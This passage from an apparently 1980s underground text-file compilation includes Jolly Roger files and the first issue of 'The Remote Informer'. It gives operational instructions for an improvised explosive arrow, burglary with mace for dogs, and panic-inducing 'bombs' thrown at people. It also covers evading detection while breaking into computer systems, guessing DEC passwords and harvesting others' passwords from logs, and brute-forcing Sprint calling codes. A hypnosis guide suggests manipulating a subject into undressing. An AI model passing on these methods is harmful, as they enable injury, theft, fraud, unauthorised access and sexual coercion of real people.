sure that the black and yellow wires are severed,
then hang up, wait about
15 seconds in case of a second pulse, reconnect the wires, pick up the phone,
and if all goes well, it should be "JACKPOT" time.
---------Exodus----------
Index
Portable Grenade Launcher by the Jolly Roger
If you have a bow, this one is for you. Remove the ferrule from an
aluminum arrow, and fill the arrow
with black powder (I use grade FFFF, it
burns easy)and then glue a shotshell primer into the hole left
where the
ferrule went. Next, glue a BB on the primer, and you are ready to go! Make sure
no one is
nearby.... Little shreds of aluminum go all over the place!!
------------Exodus----------
Index
Hacking Tutorial Courtesy of the Jolly Roger
What is hacking? According to popular belief the term hacker and hacking
was founded at mit it comes
from the root of a hack writer,someone who keeps
"hacking" at the typewriter until he finishes the
story.a computer hacker
would be hacking at the keyboard or password works.
What you need: To
hack you need a computer equipped with a modem (a device that lets you transmit
data
over phone lines) which should cost you from $100 to $1200.
How
do you hack? Hacking recuires two things:
1. The phone number
2. Answer
to identity elements
How do you find the phone #? There are three basic
ways to find a computers phone number.
1. Scanning,
2. Directory
3.
Inside info.
What is scanning? Scanning is the process of having a
computer search for a carrier tone. For
example,the computer would start at
(800) 111-1111 and wait for carrier if there is none it will go on
to
111-1112 etc.if there is a carrier it will record it for future use and continue
looking for more.
What is directory assictance? This way can only be
used if you know where your target computer is. For
this examine say it is
in menlo park, CA and the company name is sri.
1. Dial 411 (or 415-555-1212)
2. Say "Menlo park"
3. Say "Sri"
4. Write down number
5. Ask if
there are any more numbers
6. If so write them down.
7. Hang up on
operator
8. Dial all numbers you were given
9. Listen fir carrier tone
10. If you hear carrier tone write down number, call it on your modem and
your set to hack!
---------------EXODUS
Index
The Basics of Hacking II Courtesy of the Jolly Roger
Basics to know before doing anything, essential to your continuing
career as one of the elite in the
country... This article, "the introduction
to the world of hacking" is meant to help you by telling
you how not to get
caught, what not to do on a computer system, what type of equipment should I
know
about now, and just a little on the history, past present future, of
the hacker.
Welcome to the world of hacking! We, the people who live
outside of the normal rules, and have been
scorned and even arrested by
those from the 'civilized world', are becomming scarcer every day. This
is
due to the greater fear of what a good hacker (skill wise, no moral judgements
here) can do
nowadays, thus causing anti- hacker sentiment in the masses.
Also, few hackers seem to actually know about the computer systems they
hack, or what equipment they
will run into on the front end, or what they
could do wrong on a system to alert the 'higher'
authorities who monitor the
system. This article is intended to tell you about some things not to do,
even before you get on the system. I will tell you about the new wave of
front end security devices
that are beginning to be used on computers.
I
will attempt to instill in you a second identity, to be brought up at time of
great need, to pull
you out of trouble. And, by the way, I take no, repeat,
no, responcibility for what we say in this and
the forthcoming articles.
Enough of the bullshit, on to the fun: after logging on your favorite bbs,
you see on the high access board a phone number! It says it's a great system
to "fuck around with!"
This may be true, but how many other people are going
to call the same number? So: try to avoid
calling a number given to the
public. This is because there are at least every other user calling, and
how
many other boards will that number spread to?
If you call a number far, far
away, and you plan on going thru an extender or a re-seller, don't keep
calling the same access number (I.E. As you would if you had a hacker
running), this looks very
suspicious and can make life miserable when the
phone bill comes in the mail.
Most cities have a variety of access numbers
and services, so use as many as you can. Never trust a
change in the
system...
The 414's, the assholes, were caught for this reason: when one of
them connected to the system, there
was nothing good there. The next time,
there was a trek game stuck right in their way! They proceded
to play said
game for two, say two and a half hours, while telenet was tracing them!
Nice
job, don't you think? If anything looks suspicious, drop the line immediately!!
As in,
yesterday!! The point we're trying to get accross is: if you use a
little common sence, you won't get
busted. Let the little kids who aren't
smart enough to recognize a trap get busted, it will take the
heat off of
the real hackers. Now, let's say you get on a computer system... It looks great,
checks
out, everything seems fine.
Ok, now is when it gets more
dangerous. You have to know the computer system to know what not to do.
Basically, keep away from any command something, copy a new file into the
account, or whatever! Always
leave the account in the same status you logged
in with. Change *nothing*... If it isn't an account
with priv's, then don't
try any commands that require them! All, yes all, systems are going to be
keeping log files of what users are doing, and that will show up. It is just
like dropping a
trouble-card in an ESS system, after sending that nice
operator a pretty tone.
Spend no excessive amounts of time on the account in
one stretch. Keep your calling to the very late
night ifpossible, or during
business hours (believe it or not!). It so happens that there are more
users
on during business hours, and it is very difficult to read a log file with 60
users doing many
commnds every minute. Try to avoid systems where everyone
knows each other, don't try to bluff.
And above all: never act like you own
the system, or are the best there is. They always grab the
people who's
heads swell... There is some very interesting front end equipment around
nowadays, but
first let's define terms... By front end, we mean any device
that you must pass thru to get at the
real computer. There are devices that
are made to defeat hacker programs, and just plain old
multiplexers.
To
defeat hacker programs, there are now devices that pick up the phone and just
sit there... This
means that your device gets no carrier, thus you think
there isn't a computer on the other end. The
only way around it is to detect
when it was picked up. If it pickes up after the same number ring,
then you
know it is a hacker-defeater. These devices take a multi-digit code to let you
into the
system.
Some are, in fact, quite sophisticated to the point
where it will also limit the user name's down, so
only one name or set of
names can be valid logins after they input the code... Other devices input a
number code, and then they dial back a pre-programmed number for that code.
These systems are best to
leave alone, because they know someone is playing
with their phone. You may think "but i'll just
reprogram the dial-back."
Think again, how stupid that is...
Then they have your number, or a test
loop if you were just a little smarter. If it's your number,
they have your
balls (if male...), If its a loop, then you are screwed again, since those loops
are
*monitored*. As for multiplexers... What a plexer is supposed to do is
this:
The system can accept multiple users. We have to time share, so we'll
let the front-end processor do
it... Well, this is what a multiplexer does.
Usually they will ask for something like "enter class" or
"line:". Usually
it is programmed for a double digit number, or a four to five letter word. There
are
usually a few sets of numbers it accepts, but those numbers also set
your 300/1200/2400 baud data
type.
These multiplexers are inconvenient
at best, so not to worry. A little about the history of hacking:
hacking, by
my definition, means a great knowledge of some special area. Doctors and lawyers
are
hackers of a sort, by this definition. But most often, it is being used
in the computer context, and
thus we have a definition of "anyone who has a
great amount of computer or telecommunications
knowledge." You are not a
hacker because you have a list of codes...
Hacking, by my definition, has
then been around only about 15 years. It started, where else but, mit
and
colleges where they had computer science or electrical engineering departments.
Hackers have
created some of the best computer languages, the most awesome
operating systems, and even gone on to
make millions. Hacking used to have a
good name, when we could honestly say "we know what we are
doing". Now it
means (in the public eye): the 414's, ron austin, the nasa hackers, the arpanet
hackers...
All the people who have been caught, have done damage, and
are now going to have to face fines and
sentences. Thus we come past the
moralistic crap, and to our purpose: educate the hacker community,
return to
the days when people actually knew something...
--------------Exodus--------------
Index
Hacking DEC's by the Jolly Roger
In this article you will learn how to log in to dec's, logging out, and
all the fun stuff to do
in-between. All of this information is based on a
standard dec system.
Since there are dec systems 10 and 20, and I favor, the
dec 20, there will be more info on them in
this article. It just so happens
that the dec 20 is also the more common of the two, and is used by
much more
interesting people (if you know what I mean...) Ok, the first thing you want to
do when you
are receiving carrier from a dec system is to find out the
format of login names. You can do this by
looking at who is on the system.
Dec=> ` (the 'exec' level prompt)
you=> sy
sy is short for
sy(stat) and shows you the system status. You should see the format of login
names...
A systat usually comes up in this form:
job line program
user job: the job number (not important unless you want to log them off later)
line: what line they are on (used to talk to them...) These are both two or
three digit numbers.
Program: what program are they running under? If it
says 'exec' they aren't doing anything at all...
User: ahhhahhhh! This is
the user name they are logged in under...
Copy the format, and hack yourself
outa working code... Login format is as such:
dec=> `
you=> login
username password
username is the username in the format you saw above
in the systat. After you hit the space after your
username, it will stop
echoing characters back to your screen. This is the password you are typing
in... Remember, people usually use their name, their dog's name, the name of
a favorite character in a
book, or something like this. A few clever people
have it set to a key cluster (qwerty or asdfg). Pw's
can be from 1 to 8
characters long, anything after that is ignored. You are finally in...
It
would be nice to have a little help, wouldn't it? Just type a ? Or the word
help, and it will give
you a whole list of topics... Some handy characters
for you to know would be the control keys,
wouldn't it? Backspace on a dec
20 is rub which is 255 on your ascii chart. On the dec 10 it is
cntrl-h. To
abort a long listing or a program, cntrl-c works fine. Use cntrl-o to stop long
output to
the terminal.
This is handy when playing a game, but you don't
want to cntrl-c out. Cntrl-t for the time. Cntrl-u
will kill the whole line
you are typing at the moment. You may accidently run a program where the only
way out is a cntrl-x, so keep that in reserve. Cntrl-s to stop listing,
cntrl-q to continue on both
systems. Is your terminal having trouble??
Like, it pauses for no reason, or it doesn't backspace right? This is
because both systems support
many terminals, and you haven't told it what
yours is yet... You are using a vt05 so you need to tell
it you are one.
Dec=> `
you=> information terminal
or...
You=> info
this shows you what your terminal is set up as... Dec=>all sorts of
shit, then the ` you=> set ter
vt05 this sets your terminal type to vt05.
Now let's see what is in the account (here after
abbreviated acct.) that you
have hacked onto... Say
=> dir
short for directory, it shows you
what the user of the code has save to the disk. There should be a
format
like this: xxxxx.Oooxxxxx is the file name, from 1 to 20 characters long. Ooo is
the file type,
one of: exe, txt, dat, bas, cmd and a few others that are
system dependant. Exe is a compiled program
that can be run (just by typing
its name at the `). Txt is a text file, which you can see by
typing=>
type xxxxx.Txt
Do not try to
=> type xxxxx.Exe
this is
very bad for your terminal and will tell you absolutly nothing. Dat is data they
have saved.
Bas is a basic program, you can have it typed out for you. Cmd
is a command type file, a little too
complicated to go into here. Try
=> take xxxxx.Cmd
By the way, there are other users out there who
may have files you can use (gee, why else am I here?).
Type
=> dir
<*.*> (Dec 20)
=> dir [*,*] (dec 10)
* is a wildcard, and
will allow you to access the files on other accounts if the user has it set for
public access. If it isn't set for public access, then you won't see it. To
run that program:
dec=> `
you=> username program-name
username is the directory you saw the file listed under, and file name
was what else but the file
name?
** You are not alone ** remember, you
said (at the very start) sy short for systat, and how we said
this showed
the other users on the system? Well, you can talk to them, or at least send a
message to
anyone you see listed in a systat. You can do this by:
dec=> the user list (from your systat)
you=> talkusername (dec 20)
send username (dec 10)
talk allows you and them immediate
transmission of whatever you/they type to be sent to the other.
Send only
allow you one message to be sent, and send, they will send back to you, with
talk you can
just keep going. By the way, you may be noticing with the talk
command that what you type is still
acted upon by the parser (control
program). To avoid the constant error messages type either:
you=> ;your
message
you=> rem your message
the semi-colon tells the parser
that what follows is just a comment. Rem is short for 'remark' and
ignores
you from then on until you type a cntrl-z or cntrl-c, at which point it puts you
back in the
exec mode. To break the connection from a talk command type:
you=> break priv's:
if you happen to have privs, you can do all
sorts of things. First of all, you have to activate those
privs.
You=> enable
this gives you a $ prompt, and allows you to do
this: whatever you can do to your own directory you
can now do to any other
directory. To create a new acct. Using your privs, just type
=>build
username
if username is old, you can edit it, if it is new, you can
define it to be whatever you wish. Privacy
means nothing to a user with
privs. By the way, there are various levels of privs: operator, wheel,
cia.
wheel is the most powerful, being that he can log in from anywhere and have his
powers.
Operators have their power because they are at a special terminal
allowing them the privs. Cia is
short for 'confidential information access',
which allows you a low level amount of privs. Not to
worry though, since you
can read the system log file, which also has the passwords to all the other
accounts. To de-activate your privs, type
you=> disable
when
you have played your greedy heart out, you can finally leave the system with the
command
=> logout
this logs the job you are using off the system
(there may be varients of this such as kjob, or
killjob).
----------------Exodus---------------
Index
Harmless Bombs by the Jolly Roger
To all those who do not wish to inflict bodily damage on their victims
but only terror. These are
weapons that should be used from high places.
The flour bomb.
Take a wet paper towel and pour a given amount
of baking flour in the center. Then wrap it up and put
on a rubber band to
keep it together. When thrown it will fly well but when it hits, it covers the
victim with the flower or causes a big puff of flour which will put the
victim in terror since as far
as they are concerned, some strange white
powder is all over them. This is a cheap method of terror
and for only the
cost of a roll of paper towels and a bag of flour you and your friends can have
loads
of fun watching people flee in panic.
Smoke bomb projectile.
All you need is a bunch of those little round smoke bombs and a wrist
rocket or any sling-shot. Shoot
the smoke bombs and watch the terror since
they think it will blow up!
Rotten eggs (good ones)
Take some
eggs and get a sharp needle and poke a small hole in the top of each one. Then
let them sit
in a warm place for about a week. Then you've got a bunch of
rotten eggs that will only smell when
they hit.
Glow in the dark
terror.
Take one of those tubes of glow in the dark stuff and pour the
stuff on whatever you want to throw and
when it gets on the victim, they
think it's some deadly chemical or a radioactive substance so they
run in
total panic. This works especially well with flower bombs since a gummy, glowing
substance gets
all over the victim.
Fizzling panic.
Take a
baggie of a water-baking soda solution and seal it. (Make sure there is no air
in it since the
solution will form a gas and you don't want it to pop on
you.) Then put it in a bigger plastic bag and
fill it with vinegar and seal
it. When thrown, the two substances will mix and cause a violently
bubbling
substance to go all over the victim. Updated-'94
---------------Exodus-----------------
Index
Breaking Into Houses by the Jolly Roger
Okay You Need:
* Tear Gas or Mace
* A BB/Pelet Gun
* An Ice
Pick
* Thick Gloves
What You Do Is:
1. Call the ###-#### of the
house, or ring doorbell, To find out if they're home.
2. If they're not home
then...
3. Jump over the fence or walk through gate (whatever).
4. If
you see a dog give him the mace or tear gas.
5. Put the gloves on!!!!!!!
6. Shoot the BB gun slightly above the window locks.
7. Push the
ice-pick through the hole (made by the BB gun).
8. Enter window.
9.
FIRST...Find the LIVING ROOM. (they're neat things there!).
10. Then goto
the Bed-room to get a pillow case. Put the goodies in the pillow case.
11.
Get out [-* FAST! -*]
Notes: You should have certian targets worked out
(like computers, Radios, Ect.,Ect.). Also [-* NEVER
*-] Steal from your own
neigborhood. If you think they have an alarm...[-* FORGET IT! *-].
See
later file... Exodus
Index
A Guide to Hypnotism Courtesy of the Jolly Roger
(Originally an Apple ][ file, forgive the uppercase!)
+-------------------+
! WHAT HYPNOTISM IS !
+-------------------+
HYPNOTISM, CONTRARY TO COMMON BELEIF, IS MERELY STATE WHEN YOUR MIND AND
BODY ARE IN A STATE OF
RELAXATION AND YOUR MIND IS OPEN TO POSITIVE, OR
CLEVERLY WORDED NEGATIVE, INFLUENCES. IT IS NOT A
TRANCE WHERE YOU:
*
ARE TOTALLY INFLUENCABLE.
* CANNOT LIE.
* A SLEEP WHICH YOU CANNOT WAKE
UP FROM WITHOUT HELP.
THIS MAY BRING DOWN YOUR HOPE SOMEWHAT, BUT,
HYPNOTISM IS A POWERFUL FOR SELF HELP, AND/OR MISCHEIF.
+-----------------------+
! YOUR SUBCONCIOUS MIND !
+-----------------------+
BEFORE GOING IN FURTHER, I'D LIKE TO STATE
THAT HYPNOTISM NOT ONLY IS GREAT IN THE WAY THAT IT RELAXES
YOU AND GETS YOU
(IN THE LONG RUN) WHAT YOU WANT, BUT ALSO THAT IT TAPS A FORCE OF INCREDIBLE
POWER,
BELEIVE IT OR NOT, THIS POWER IS YOUR SUBCONCIOUS MIND.
THE
SUBCONCIOUS MIND ALWAYS KNOWS WHAT IS GOING ON WITH EVERY PART OF YOUR BODY,
EVERY MOMENT OF THE
DAY. IT PROTECTS YOU FROM NEGATIVE INFLUENCES, AND
RETAINS THE POWER TO SLOW YOUR HEARTBEAT DOWN AND
STUFF LIKE THAT. THE
SUBCONCIOUS MIND HOLDS JUST ABOUT ALL THE INFO YOU WOULD LIKE TO KNOW ABOUT
YOURSELF, OR, IN THIS CASE, THE PERSON YOU WILL BE HYPNOTISING. THERE ARE
MANY WAYS TO TALK TO YOUR
SUBCONCIOUS AND HAVE IT TALK BACK TO YOU. ONE WAY
IS THE OUJA BOARD, NO ITS NOT A SPIRIT, MERELY THE
MINDS OF THOSE WHO ARE
USING IT. ANOTHER, WHICH I WILL DISCUSS HERE, IS THE PENDULUM METHOD. OK, HERE
IS HOW IT GOES.
FIRST, GET A RING OR A WASHER AND TIE IT TO A THREAD A
LITTLE LONGER THAN HALF OF YOUR FOREARM. NOW,
TAKE A SHEET OF PAPER AND DRAW
A BIG CIRCLE IN IT. IN THE BIG CIRCLE YOU MUST NOW DRAW A CROSSHAIR (A
BIG
+). NOW, PUT THE SHEET OF PAPER ON A TABLE. NEXT, HOLD THE THREAD WITH THE RING
OR WASHER ON IT
AND PLACE IT (HOLDING THE THREAD SO THAT THE RING IS 1 INCH
ABOVE THE PAPER SWINGING) IN THE MIDDLE OF
THE CROSSHAIR. NOW, SWING THE
THREAD SO THE WASHER GOES UP AND DOWN, SAY TO YOURSELF THE WORD "YES"
NOW,
DO IT SIDE TO SIDE AND SAY THE WORD "NO".
DO IT COUNTER CLOCKWISE AND SAY "I
DON'T KNOW". AND LASTLY, DO IT CLOCKWISE AND SAY "I DONT WANT TO
SAY." NOW,
WITH THE THREAD BACK IN THE MIDDLE OF THE CROSSHAIR, ASK YOURSELF QUESTIONS AND
WAIT FOR
THE PENDULUM TO SWING IN THE DIRECTION FOR THE ANSWER. (YES, NO, I
DONT KNOW OR I DONT WANNA SAY...).
SOON, TO YOUR AMAZEMENT, IT WILL BE
ANSWERING QUESTIONS LIKE ANYTHING... LET THE PENDULUM ANSWER, DONT
TRY..
WHEN YOU TRY YOU WILL NEVER GET AN ANSWER. LET THE ANSWER COME TO YOU.
+-------------------------+
! HOW TO INDUCE HYPNOTISM !
+-------------------------+
NOW THAT YOU KNOW HOW TO TALK TO YOUR
SUBCONCIOUS MIND, I WILL NOW TELL YOU HOW TO GUIDE SOMEONE INTO
HYPNOSIS.
NOTE THAT I SAID GUIDE, YOU CAN NEVER, HYNOTISE SOMEONE, THEY MUST BE WILLING.
OK, THE
SUBJECT MUST BE LYING OR SITTING IN A COMFORTABLE POSITION, RELAXED,
AND AT A TIME WHEN THINGS ARENT
GOING TO BE INTERRUPTED.
TELL THEM THE
FOLLOWING OR SOMETHING CLOSE TO IT, IN A PEACEFUL, MONOTINOUS TONE (NOT A
COMMANDING
TONE OF VOICE)
NOTE: LIGHT A CANDLE AND PLACE IT SOMEWHERE
WHERE IT CAN BE EASILY SEEN.
TAKE A DEEP BREATH THROUGH YOUR NOSE AND HOLD
IT IN FOR A COUNT OF 8. NOW, THROUGH YOUR MOUTH, EXHALE
COMPLETELY AND
SLOWLY. CONTINUED BREATHING LONG, DEEP, BREATHS THROUGH YOUR NOSE AND EXHALING
THROUGH
YOUR MOUTH. TENSE UP ALL YOUR MUSCLES VERY TIGHT, NOW, COUNTING FROM
TEN TO ONE, RELEASE THEM SLOWLY,
YOU WILL FIND THEM VERY RELAXED. NOW, LOOK
AT THE CANDLE, AS YOU LOOK AT IT, WITH EVERY BREATH AND
PASSING MOMEMENT,
YOU ARE FEELING INCREASINGLY MORE AND MORE PEACEFUL AND RELAXED. THE CANDLES
FLAME
IS PEACEFUL AND BRIGHT.
AS YOU LOOK AT IT I WILL COUNT FROM 100
DOWN, AS A COUNT, YOUR EYES WILL BECOME MORE AND MORE RELAXED,
GETTING MORE
AND MORE TIRED WITH EACH PASSING MOMENT."
NOW, COUNT DOWN FROM 100, ABOUT
EVERY 10 NUMBERS SAY "WHEN I REACH XX YOUR EYES (OR YOU WILL FIND YOUR
EYES)
ARE BECOMING MORE AND MORE TIRED." TELL THEM THEY MAY CLOSE THEIR EYES WHENEVER
THEY FEEL LIKE
IT. IF THE PERSONS EYES ARE STILL OPEN WHEN YOU GET TO 50
THEN INSTEAD OF SAYING "YOUR EYES WILL.."
SAY "YOUR EYES ARE...".
WHEN
THEIR EYES ARE SHUT SAY THE FOLLOWING. AS YOU LIE (OR SIT) HERE WITH YOUR EYES
COMFORTABLY CLOSE
YOU FIND YOURSELF RELAXING MORE AND MORE WITH EACH MOMENT
AND BREATH.
THE RELAXATION FEELS PLEASANT AND BLISSFUL SO, YOU HAPPILY GIVE
WAY TO THIS WONDERFUL FEELING.
IMAGINGE YOURSELF ON A CLOUD, RESTING
PEACEFULLY, WITH A SLIGHT BREEZE CARESSING YOUR BODY. A TINGLING
SENSASION
BEGINS TO WORK ITS WAY, WITHIN AND WITHOUT YOUR TOES, IT SLOWLY MOVES UP YOUR
FEET, MAKING
THEM WARM, HEAVY AND RELAXED. THE CLOUD IS SOFT AND SUPPORTS
YOUR BODY WITH ITS SOFT TEXTURE, THE
SCENE IS PEACEFUL AND ABSORBING, THE
PEACEFULNESS ABSORBS YOU COMPLETELY...
THE TINGLING GENTLY AND SLOWLY MOVES
UP YOUR LEGS, RELAXING THEM. MAKING THEM WARM AND HEAVY. THE
RELAXATION
FEELS VERY GOOD, IT FEELS SO GOOD TO RELAX AND LET GO. AS THE TINGLING CONTINUES
ITS
JOURNEY UP INTO YOUR SOLAR PLEXUS, YOU FEEL YOUR INNER STOMACH BECOME
VERY RELAXED. NOW, IT MOVES
SLOWLY INTO YOUR CHEST, MAKING YOUR BREATHING
RELAXED AS WELL. THE FEELING BEGINS TO MOVE UP YOUR ARMS
TO YOUR SHOULDERS,
MAKING YOUR ARMS HEAVY AND RELAXED AS WELL. YOU ARE AWARE OF THE TOTAL
RELAXATION
YOU ARE NOW EXPERIENCING, AND YOU GIVE WAY TO IT. IT IS GOOD AND
PEACEFUL, THE TINGLING NOW MOVEVES
INTO YOUR FACE AND HEAD, RELAXING YOUR
JAWS, NECK, AND FACIAL MUSCLES, MAKING YOUR CARES AND WORRIES
FLOAT AWAY.
AWAY INTO THE BLUE SKY AS YOU REST BLISFUlLY ON THE CLOUD....
IF THEY ARE
NOT RESPONSIVE OR YOU THINK THEY (HE OR SHE..) IS GOING TO SLEEP, THEN ADD IN A
"...ALWAYS
CONCENTRATING UPON MY VOICE, INGORING ALL OTHER SOUNDS. EVEN
THOUGH OTHER SOUNDS EXSIST, THEY AID YOU
IN YOUR RELAXATION..." THEY SHOULD
SOON LET OUT A SIGH AS IF THEY WERE LETTING GO, AND THEIR FACE
SHOULD HAVE A
"WOODENESS" TO IT, BECOMING FEATURLESS... NOW, SAY THE FOLLOWING ".... YOU NOW
FIND
YOURSELF IN A HALLWAY, THE HALLWAY IS PEACEFUL AND NICE. AS I COUNT
FROM 10 TO 1 YOU WILL IMAGINE
YOURSELF WALKING FURTHER AND FURTHER DOWN THE
HALL. WHEN I REACH ONE YOU WILL FIND YOURSELF WHERE YOU
WANT TO BE, IN
ANOTHER, HIGHER STATE OF CONCIOUS AND MIND. (COUNT FROM TEN TO ONE)....." DO
THIS ABOUT
THREE OR FOUR TIMES.
THEN, TO TEST IF THE SUBJECT IS UNDER
HYPNOSIS OR NOT, SAY.... "...YOU FEEL A STRANGE SENSATION IN
YOUR (ARM THEY
WRITE WITH) ARM, THE FEELING BEGINS AT YOUR FINGERS AND SLOWLY MOVES UP YOUR
ARM, AS IT
MOVES THROUGH YOUR ARM YOUR ARM BECOMES LIGHTER AND LIGHTER, IT
WILL SOON BE SO LIGHT IT WILL .....
BECOMING LIGHTER AND LIGHTER WHICH EACH
BREATH AND MOMENT..."
THEIR FINGERS SHOULD BEGIN TO TWITCH AND THEN MOVE UP,
THE ARM FOLLOWING, NOW MY FRIEND, YOU HAVE
HIM/HEP IN HYPNOSIS. THE FIRST
TIME YOU DO THIS, WHILE HE/SHE IS UNDER SAY GOOD THINGS, LIKE: "YOUR
GOING
TO FEEL GREAT TOMORROW" OR "EVERY DAY IN EVERY WAY YOU WILL FIND YOURSELF
BECOMING BETTER AND
BETTER".. OR SOME CRAP LIKE THAT... THE MORE THEY GO
UNDER, THE DEEPER IN HYPNOSIS THEY WILL GET EACH
TIME YOU DO IT.
+----------------------------+
! WHAT TO DO WHEN HYPNOTISED !
+----------------------------+
WHEN YOU HAVE THEM UNDER YOU MUST
WORD THINGS VERY CAREFULLY TO GET YOUR WAY. YOU CANNOT SIMPLY SAY...
TAKE
OFF YOUR CLOTHES AND FUCK THE PILLOW. NO, THAT WOULD NOT REALLY DO THE TRICK.
YOU MUST SAY
SOMETHING LIKE.... "YOU FIND YOUR SELF AT HOME, IN YOUR ROOM
AND YOU HAVE TO TAKE A SHOWER (VIVIDLY
DESCRIBE THEIR ROOM AND WHATS
HAPPENING), YOU BEGIN TO TAKE OFF YOUR CLOTHES..." NOW, IT CANT BE THAT
SIMPLE, YOU MUST KNOW THE PERSONS HOUSE, ROOM, AND SHOWER ROOM. THEN
DESCRIBE THINGS VIVIDLY AND TELL
THEM TO ACT IT OUT (THEY HAVE TO BE DEEPLY
UNDER TO DO THIS...). I WOULD JUST SUGGEST THAT YOU
EXPERIMENT A WHILE, AND
GET TO KNOW HO; TO DO THINGS.
+-----------+
! WAKING UP !
+-----------+
WAKING UP IS VERY EASY, JUST SAY.. "...AS I COUNT FROM
1 TO 5 YOU WILL FIND YOURSELF BECOMMING MORE
AND MORE AWAKE, MORE AND MORE
LIVELY. WHEN YOU WAKE UP YOU WILL FIND YOURSELF COMPLETELY ALIVE, AWAKE,
AND
REFRESHED. MENTALLY AND PHYSICALLY, REMEMBERING THE PLEASANT SENSATION THAT
HYPNOSIS BRINGS...
WAKING UP FEELING LIKE A NEW BORN BABY, REBORN WITH LIFE
AND VIGOR, FEELING EXCELLENT. REMEMBERING
THAT NEXT TIME YOU ENTER HYPNOSIS
IT WILL BECOME AN EVER INCREASING DEEPER AND DEEPER STATE THAN
BEFORE.
*
YOU FEEL ENERGY COURSE THROUGHOUT YOUR LIMBS.
* YOU BEGIN TO BREATHE DEEPLY,
STIRRING.
* BEGINING TO MOVE MORE AND MORE YOUR EYES OPEN, BRINGING YOU UP
TO FULL CONCIOUS.
* YOU ARE UP,UP, UP AND AWAKENING MORE AND MORE.
* YOU
ARE AWAKE AND FEELING GREAT."
AND THATS IT! YOU NOW KNOW HOW TO
HYPNOTISE YOURSELF AND SOMEONE ELSE. YOU WILL LEARN MORE AND MORE AS
YOU
EXPERIMENT.
------------------Jolly Roger
Index
The Remote Informer
Reader supported newsletter for the underworld
Editors: Tracker and
Norman Bates
September 1987 Issue: 01
The Headlines
1.
Introduction
2. Hacking Sprint: The Easy Way
3. Rumors: Why spread them?
4. The New Sprint FON Calling Cards
5. Automatic Number Identifier (ANI)
Introduction
Welcome to the first issue of 'The Remote
Informer'! This newsletter is reader supported. If the
readers of this
newsletter do not help support it, then it will end. We are putting this out to
help
out the ones that would like to read it. If you are one of those who
thinks they know everything, then
don't bother reading it. This newsletter
is not anything like the future issues. The future issues
will contain
several sections, as long as reader input is obtained. Below is an outline
overview of
the sections in the future issues.
I/O Board
(Input/Output Board)
The I/O Board is for questions you have, that we
might be able to answer or atleast refer you to
someone or something. We
will be honest if we cannot help you. We will not make up something, or to
the effect, just to make it look like we answered you. There will be a
section in the I/O Board for
questions we cannot answer, and then the
readers will have the opportunity to answer it. We will print
anything that
is reasonable in the newsletter, even complaints if you feel like you are better
than
everyone.
NewsCenter
This section will be for news
around the underworld. It will talk of busts of people in the underworld
and
anything else that would be considered news. If you find articles in the paper,
or something
happens in your local area, type it up, and upload it to one of
the boards listed at the end of the
newsletter. Your handle will be placed
in the article. If you do enter a news article, please state
the date and
from where you got it.
Feature Section
The Feature Section will
be the largest of the sections as it will be on the topic that is featured in
that issue. This will be largely reader input which will be sent in between
issues. At the end of the
issue at hand, it will tell the topic of the next
issue, therefore, if you have something to
contribute, then you will have
ample time to prepare your article.
Hardware/Software Review
In
this section, we will review the good and bad points of hardware and software
related to the
underworld. It will be an extensive review, rather than just
a small paragraph.
The Tops
This section will be the area where
the top underworld BBS's, hacking programs, modem scanners, etc.
will be
shown. This will be reader selected and will not be altered in anyway. The
topics are listed
below.
* Underworld BBS's (Hack, Phreak, Card,
Anarchy, etc.)
* Hacking programs for Hayes compatables
* Hacking
programs for 1030/Xm301 modems
* Modem scanners for Hayes compatables
*
Modem scanners for 1030/Xm301 modems
* Other type illegal programs
You may add topics to the list if enough will support it.
Tid
Bits
This will contain tips and helpful information sent in by the
users. If you have any information you
wish to contribute, then put it in a
text file and upload it to one of the BBS's listed at the end of
the
newsletter.
Please, no long distance codes, mainframe passwords, etc. We may
add other sections as time goes by.
This newsletter will not be put out on a
regular basis. It will be put out when we have enough
articles and
information to put in it. There may be up to 5 a month, but there will always be
at least
one a month. We would like you, the readers, to send us anything
you feel would be of interest to
others, like hacking hints, methods of
hacking long distance companies, companies to card from, etc.
We will
maintain the newsletter as long as the readers support it. That is the end of
the
introduction, but take a look at this newsletter, as it does contain
information that may be of value
to you.
Hacking Sprint: The Easy
Way By: Tracker
If you hack US Sprint, 950-0777 (by the way it is no
longer GTE Sprint), and you are fustrated at
hacking several hours only to
find one or two codes, then follow these tips, and it will increase your
results tremendously. First, one thing that Mr. Mojo proved is that Sprint
will not store more than
one code in every hundred numbers. (ex: 98765400 to
98765499 may contain only one code). There may NOT
be a code in that
hundred, but there will never be more than one.
Sprint's 9 digit codes are
stored from 500000000 through 999999999. In the beginning of Sprint's 950
port, they only had 8 digit codes. Then they started converting to 9 digit
codes, storing all 8 digit
codes between 10000000 and 49999999 and all 9
digit codes between 500000000 and 999999999. Sprint has
since cancelled most
8 digit codes, although there are a few left that have been denoted as test
codes. Occaisionally, I hear of phreaks saying they have 8 digit codes, but
when verifying them, the
codes were invalid.
Now, where do you start?
You have already narrowed the low and high numbers in half, therefore already
increasing your chances of good results by 50 percent. The next step is to
find a good prefix to hack.
By the way, a prefix, in hacking terms, is the
first digits in a code that can be any length except
the same number of
digits the code is. (ex: 123456789 is a code. That means 1, 12, 123, 1234,
12345,
123456, 1234567, and 12345678 are prefixes) The way you find a good
prefix to hack is to manually
enter a code prefix. If when you enter the
code prefix and a valid destination number and you do not
hear the ringing
of the recording telling you that the code is invalid until near the end of the
number, then you know the prefix is valid. Here is a chart to follow when
doing this:
Code - Destination Range good codes exist
-------------------------------------------------
123456789 - 6192R
123400000 - 123499999
123456789 - 619267R 123450000 - 123459999
123456789 - 61926702R 123456000 - 123456999
123456789 - 6192670293R
123456700 - 123456799
-------------------------------------------------
( R - Denotes when ring for recording starts)
To prove this true, I
ran a test using OmniHack 1.3p, written by Jolly Joe. In this test I found a
prefix where the last 3 digits were all I had to hack. I tested each hundred
of the 6 digit prefix
finding that all but 4 had the ring start after the
fourth digit was dialed in the destination number.
The other four did not
ring until I had finished the entire code. I set OmniHack to hack the prefix +
00 until prefix + 99. (ex: xxxxxxy00 to xxxxxxy99: where y is one of the
four numbers that the ring
did not start until the dialing was completed.)
Using this method, I found four codes in a total of
241 attempts using
ascending hacking (AKA: Sequential). Below you will see a record of my hack:
Range of hack Codes found Tries
----------------------------------------------
xxxxxx300 - xxxxxx399
xxxxxx350 50
xxxxxx500 - xxxxxx599 xxxxxx568 68
xxxxxx600 - xxxxxx699
xxxxxx646 46
xxxxxx800 - xxxxxx899 xxxxxx877 77
----------------------------------------------
Totals 4 codes 241
As you see, these methods work. Follow these guidlines and tips and you
should have an increase in
